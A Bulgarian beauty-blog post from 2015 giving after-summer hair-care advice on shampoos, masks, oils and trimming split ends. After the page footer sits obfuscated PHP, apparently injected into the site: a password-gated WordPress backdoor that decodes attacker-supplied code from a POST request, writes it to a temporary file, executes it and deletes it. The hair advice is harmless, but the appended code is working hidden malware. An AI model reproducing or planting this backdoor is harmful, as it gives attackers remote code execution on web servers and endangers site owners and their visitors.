Грижи за косата след лятото | Косопад

Грижи за косата след лятото

kosa-sled-liato

През лятото се наслаждаваме на морето и басейните. Слънцето и хлорът обаче влияят доста негативно на косите ни. Когато отпуската ви приключи, ще забележите, че косата ви по- лесно се наелектризира, при допир е груба и няма блясък. За да върнем здравия вид на косата, трябва да положим малко по- специални грижи.

ЕФЕКТЪТ НА ЛЯТОТО

Слънцето прави по- лесен цъфтежа на косата и нейното късане, особено ако косата е боядисана и накъдрена. Слънцето засяга външната обвивка, която придава блясъка на косата и я предпазва от външно влияние. Ако косата ви е мазна, косата ви ще е по- лека и блестяща през лятото и проблемите, които сте имали през зимата, няма да са толкова ярко изразени.

kosa-lyato

ГРИЖИ ПРЕЗ ЛЯТОТО

За да се възстанови по- бързо косата след лятото, трябва и тогава да се грижим добре за нея. Използвайте подхранващи и хидратиращи шампоани. Трябва да съдържа протеини и хидратиращи агенти.

КАКВО ДА ПРАВИМ СЛЕД ЛЯТОТО

След лятото продължаваме да използваме такъв шампоан. Може да си правите маски, които да подхранват в дълбочина. Ако косата ви е повече увредена, използвайте подхранващи ампули върху суха коса преди миене. Трябва да оставите да престои половин час и след това да измиете. Друг вариант са подхранващите масла.

За да се справите най- добре с цъфналите връхчета, е да отидете на фризьор и да ги подстрижете.

14. септември 2015 16:35:48 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}